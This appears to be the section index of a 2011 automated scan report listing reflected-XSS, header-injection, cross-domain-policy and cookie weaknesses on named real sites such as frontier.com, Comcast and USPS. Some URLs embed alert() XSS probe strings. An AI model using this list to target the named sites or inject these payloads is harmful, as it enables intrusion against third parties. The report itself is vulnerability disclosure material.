XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-01
Report generated by XSS.Cx at Tue Sep 06 11:57:40 GMT-06:00 2011.
Contents
1. HTTP header injection
1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]
1.3. http://pixel.everesttech.net/2565/c [url parameter]
1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]
1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]
1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]
1.7. http://udmserve.net/udm/img.fetch [dt cookie]
1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]
1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]
1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]
1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]
1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]
1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]
1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]
1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]
1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]
1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]
1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]
1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]
1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]
1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]
1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]
1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]
1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]
1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]
1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]
1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]
1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]
1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]
1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]
1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]
1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]
1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]
1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]
1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]
1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]
1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]
1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]
1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]
1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]
1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]
1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]
1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]
1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]
1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]
1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]
1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]
2. Cross-site scripting (reflected)
2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]
2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]
2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]
2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]
2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]
2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]
2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]
2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]
2.13. http://ads.media.net/medianet.php [size parameter]
2.14. http://ads.pointroll.com/PortalServe/ [r parameter]
2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]
2.16. http://ads.pointroll.com/PortalServe/ [time parameter]
2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]
2.18. http://adserver.teracent.net/tase/ad [rcu parameter]
2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]
2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]
2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]
2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]
2.23. http://event.adxpose.com/event.flow [uid parameter]
2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]
2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]
2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]
2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]
2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]
2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]
2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]
2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]
2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]
2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]
2.40. http://frontier.com/winwin1 [REST URL parameter 1]
2.41. http://frontier.com/winwin1 [mkwid parameter]
2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]
2.43. http://frontier.com/winwin1 [pcrid parameter]
2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]
2.45. http://ib.adnxs.com/seg [redir parameter]
2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]
2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]
2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]
2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]
2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]
2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]
2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]
2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]
2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]
2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]
2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]
2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]
2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]
2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]
2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]
2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]
2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]
2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]
2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]
2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]
2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]
2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]
2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]
2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]
2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]
2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]
2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]
2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]
2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]
2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]
2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]
2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]
2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]
2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]
2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]
2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]
2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]
2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]
2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]
2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]
2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]
2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]
2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]
2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]
2.102. http://www.myfitv.com/search [query parameter]
2.103. http://www.vonage.com/search.php [lang_cntry parameter]
2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]
2.105. http://www.vonage.com/search.php [q parameter]
2.106. http://www.vonage.com/search.php [q parameter]
2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]
2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]
2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]
2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]
2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]
2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]
2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]
2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]
2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]
2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]
2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]
2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]
2.119. http://yp.frontierpages.com/results.aspx [term parameter]
2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]
2.121. http://sitesearch.comcast.com/ [Referer HTTP header]
2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]
2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]
2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]
2.125. http://frontier.my.yahoo.com/ [B cookie]
2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]
2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]
2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]
2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]
2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]
2.132. http://www.frontierpages.com/ [FrontierPages cookie]
2.133. http://www.frontierpages.com/ [FrontierPages cookie]
2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]
2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]
3. Flash cross-domain policy
3.1. http://40.xg4ken.com/crossdomain.xml
3.2. http://ad.agkn.com/crossdomain.xml
3.3. http://ad.turn.com/crossdomain.xml
3.4. http://admin.brightcove.com/crossdomain.xml
3.5. http://ads.media.net/crossdomain.xml
3.6. http://ads.pointroll.com/crossdomain.xml
3.7. http://ads.yimg.com/crossdomain.xml
3.8. http://ads.yldmgrimg.net/crossdomain.xml
3.9. http://adserver.teracent.net/crossdomain.xml
3.10. http://altfarm.mediaplex.com/crossdomain.xml
3.11. http://api.facebook.com/crossdomain.xml
3.12. http://as.casalemedia.com/crossdomain.xml
3.13. http://as1.suitesmart.com/crossdomain.xml
3.14. http://b.scorecardresearch.com/crossdomain.xml
3.15. http://by.optimost.com/crossdomain.xml
3.16. http://cdn.turn.com/crossdomain.xml
3.17. http://cimage.adobe.com/crossdomain.xml
3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml
3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml
3.20. http://cr0.worthathousandwords.com/crossdomain.xml
3.21. http://d.yimg.com/crossdomain.xml
3.22. http://e.yimg.com/crossdomain.xml
3.23. http://ec.atdmt.com/crossdomain.xml
3.24. http://ehg-verizon.hitbox.com/crossdomain.xml
3.25. http://event.adxpose.com/crossdomain.xml
3.26. http://event.rtrk.com/crossdomain.xml
3.27. http://external.ak.fbcdn.net/crossdomain.xml
3.28. http://g-pixel.invitemedia.com/crossdomain.xml
3.29. http://iar.worthathousandwords.com/crossdomain.xml
3.30. http://ib.adnxs.com/crossdomain.xml
3.31. http://img.mediaplex.com/crossdomain.xml
3.32. http://int.teracent.net/crossdomain.xml
3.33. http://integrate.112.2o7.net/crossdomain.xml
3.34. http://l.yimg.com/crossdomain.xml
3.35. http://landing.optionshouse.com/crossdomain.xml
3.36. http://log30.doubleverify.com/crossdomain.xml
3.37. http://metrics.scottrade.com/crossdomain.xml
3.38. http://metrics.vonage.com/crossdomain.xml
3.39. http://pixel.everesttech.net/crossdomain.xml
3.40. http://pixel.fetchback.com/crossdomain.xml
3.41. http://pixel.invitemedia.com/crossdomain.xml
3.42. http://pixel.quantserve.com/crossdomain.xml
3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml
3.44. http://query.yahooapis.com/crossdomain.xml
3.45. http://r.casalemedia.com/crossdomain.xml
3.46. http://redirect.rtrk.com/crossdomain.xml
3.47. http://s0.2mdn.net/crossdomain.xml
3.48. http://segment-pixel.invitemedia.com/crossdomain.xml
3.49. http://sensor2.suitesmart.com/crossdomain.xml
3.50. http://serviceo.comcast.net/crossdomain.xml
3.51. http://spe.atdmt.com/crossdomain.xml
3.52. http://speed.pointroll.com/crossdomain.xml
3.53. http://t.invitemedia.com/crossdomain.xml
3.54. http://t.pointroll.com/crossdomain.xml
3.55. http://tags.bluekai.com/crossdomain.xml
3.56. http://utdi.reachlocal.com/crossdomain.xml
3.57. http://utdi.reachlocal.net/crossdomain.xml
3.58. http://whitefence.112.2o7.net/crossdomain.xml
3.59. http://www.burstnet.com/crossdomain.xml
3.60. http://www.myfitv.com/crossdomain.xml
3.61. http://www.zillow.com/crossdomain.xml
3.62. http://www2.whitefence.com/crossdomain.xml
3.63. http://yql.yahooapis.com/crossdomain.xml
3.64. http://a.adready.com/crossdomain.xml
3.65. http://ads.bridgetrack.com/crossdomain.xml
3.66. http://espanol.vonage.com/crossdomain.xml
3.67. http://finance.yahoo.com/crossdomain.xml
3.68. http://frontier.my.yahoo.com/crossdomain.xml
3.69. http://geo.yahoo.com/crossdomain.xml
3.70. http://gws.maps.yahoo.com/crossdomain.xml
3.71. http://maps.yahoo.com/crossdomain.xml
3.72. http://media.sonypictures.com/crossdomain.xml
3.73. http://mi.adinterax.com/crossdomain.xml
3.74. http://movies.yahoo.com/crossdomain.xml
3.75. http://music.yahoo.com/crossdomain.xml
3.76. http://new.music.yahoo.com/crossdomain.xml
3.77. http://omg.yahoo.com/crossdomain.xml
3.78. http://optimized-by.rubiconproject.com/crossdomain.xml
3.79. http://pagead2.googlesyndication.com/crossdomain.xml
3.80. http://realestate.yahoo.com/crossdomain.xml
3.81. http://scottrade.wsod.com/crossdomain.xml
3.82. http://search.yahoo.com/crossdomain.xml
3.83. http://shopping.yahoo.com/crossdomain.xml
3.84. http://sports.yahoo.com/crossdomain.xml
3.85. http://static.ak.fbcdn.net/crossdomain.xml
3.86. https://us.etrade.com/crossdomain.xml
3.87. http://video.music.yahoo.com/crossdomain.xml
3.88. http://www.comcast.net/crossdomain.xml
3.89. http://www.facebook.com/crossdomain.xml
3.90. http://www.fidelity.com/crossdomain.xml
3.91. https://www.fidelity.com/crossdomain.xml
3.92. http://www.pgatour.com/crossdomain.xml
3.93. http://xfinity.comcast.net/crossdomain.xml
3.94. http://www.vonage.com/crossdomain.xml
4. Silverlight cross-domain policy
4.1. http://ads.pointroll.com/clientaccesspolicy.xml
4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml
4.3. http://citizenstelecom.112.2o7.net/clientaccesspolicy.xml
4.4. http://ec.atdmt.com/clientaccesspolicy.xml
4.5. http://integrate.112.2o7.net/clientaccesspolicy.xml
4.6. http://metrics.scottrade.com/clientaccesspolicy.xml
4.7. http://metrics.vonage.com/clientaccesspolicy.xml
4.8. http://pixel.quantserve.com/clientaccesspolicy.xml
4.9. http://s0.2mdn.net/clientaccesspolicy.xml
4.10. http://serviceo.comcast.net/clientaccesspolicy.xml
4.11. http://spe.atdmt.com/clientaccesspolicy.xml
4.12. http://speed.pointroll.com/clientaccesspolicy.xml
4.13. http://whitefence.112.2o7.net/clientaccesspolicy.xml
4.14. http://www.fidelity.com/clientaccesspolicy.xml
4.15. https://www.fidelity.com/clientaccesspolicy.xml
5. SSL cookie without secure flag set
5.1. https://go.ooma.com/activate
5.2. https://go.ooma.com/activate/activation_code
5.3. https://www.fidelity.com/welcome/200-free-trades
5.4. https://www.comcast.com/Localization/Localize.cspx
5.5. https://www.comcast.com/includes/js/IDGenerator.ashx
6. Session token in URL
6.1. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard
6.2. https://login.comcast.net/myaccount/lookup
6.3. http://omg.yahoo.com/
6.4. http://omg.yahoo.com/xhr/ad/LREC/2115806991
6.5. http://www.facebook.com/extern/login_status.php
6.6. http://www.websitealive9.com/2140/visitor/vTrackerSrc_v2.asp
7. SSL certificate
7.1. https://login.yahoo.com/
7.2. https://www.comcastsupport.com/
7.3. https://www.frontier.com/
7.4. https://customer.comcast.com/
7.5. https://go.ooma.com/
7.6. https://login.aptela.com/
7.7. https://login.comcast.net/
7.8. https://login.frontier.com/
7.9. https://login.frontiermobile.com/
7.10. https://us.etrade.com/
7.11. https://www.comcast.com/
7.12. https://www.fidelity.com/
7.13. https://www.frontiermobile.com/
7.14. https://www.optionshouse.com/
7.15. https://www.usps.com/
8. Password field submitted using GET method
9. Cookie scoped to parent domain
9.1. http://pixel.everesttech.net/2565/c
9.2. http://pixel.everesttech.net/2565/i
9.3. http://40.xg4ken.com/media/redir.php
9.4. http://ad.agkn.com/iframe!t=1129!
9.5. http://ad.agkn.com/iframe!t=1131!
9.6. http://ads.lucidmedia.com/clicksense/pixel
9.7. http://ads.pointroll.com/PortalServe/
9.8. http://adserver.teracent.net/tase/ad
9.9. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
9.10. http://ak1.abmr.net/is/www.burstnet.com
9.11. http://b.scorecardresearch.com/b
9.12. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1
9.13. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1
9.14. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI
9.15. http://ehg-verizon.hitbox.com/HG
9.16. http://espanol.vonage.com/mpel.js
9.17. http://external.dmtracker.com/tags/vs.js
9.18. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
9.19. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message
9.20. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36
9.21. http://frontier.my.yahoo.com/
9.22. http://frontier.my.yahoo.com/e/js
9.23. http://gdyn.pgatour.com/1.1/1.gif
9.24. http://ib.adnxs.com/seg
9.25. http://id.google.com/verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif
9.26. http://int.teracent.net/tase/int
9.27. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
9.28. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js
9.29. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js
9.30. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js
9.31. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js
9.32. http://optimized-by.rubiconproject.com/a/dk.js
9.33. http://pixel.fetchback.com/serve/fb/pdc
9.34. http://pixel.quantserve.com/api/segments.json
9.35. http://pixel.quantserve.com/pixel
9.36. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
9.37. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443
9.38. http://redirect.rtrk.com/redirect
9.39. http://sales.liveperson.net/hc/21807557/
9.40. http://sensor2.suitesmart.com/sensor4.js
9.41. http://testdm.travelers.com/trvwics.gif
9.42. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif
9.43. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif
9.44. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif
9.45. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif
9.46. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif
9.47. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif
9.48. http://utdi.reachlocal.com/
9.49. http://utdi.reachlocal.net/index.html
9.50. http://www.burstnet.com/enlightn/8117/3E06/
9.51. https://www.comcast.com/Localization/Localize.cspx
9.52. http://www.zillow.com/app
10. Cookie without HttpOnly flag set
10.1. http://ads.adxpose.com/ads/ads.js
10.2. http://event.adxpose.com/event.flow
10.3. http://pixel.everesttech.net/2565/c
10.4. http://pixel.everesttech.net/2565/i
10.5. http://sales.liveperson.net/visitor/addons/deploy.asp
10.6. https://www.fidelity.com/welcome/200-free-trades
10.7. http://www.frontierhelp.com/
10.8. http://www.whitefence.com/a
10.9. http://40.xg4ken.com/media/redir.php
10.10. http://ad.agkn.com/iframe!t=1129!
10.11. http://ad.agkn.com/iframe!t=1131!
10.12. http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**
10.13. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**
10.14. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**
10.15. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**
10.16. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**
10.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**
10.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**
10.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187
10.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187
10.21. http://ad.yieldmanager.com/iframe3
10.22. http://ad.yieldmanager.com/iframe3
10.23. http://ad.yieldmanager.com/iframe3
10.24. http://ad.yieldmanager.com/imp
10.25. http://ad.yieldmanager.com/imp
10.26. http://ad.yieldmanager.com/imp
10.27. http://ad.yieldmanager.com/pixel
10.28. http://ads.bridgetrack.com/site/rtgt.asp
10.29. http://ads.lucidmedia.com/clicksense/pixel
10.30. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568
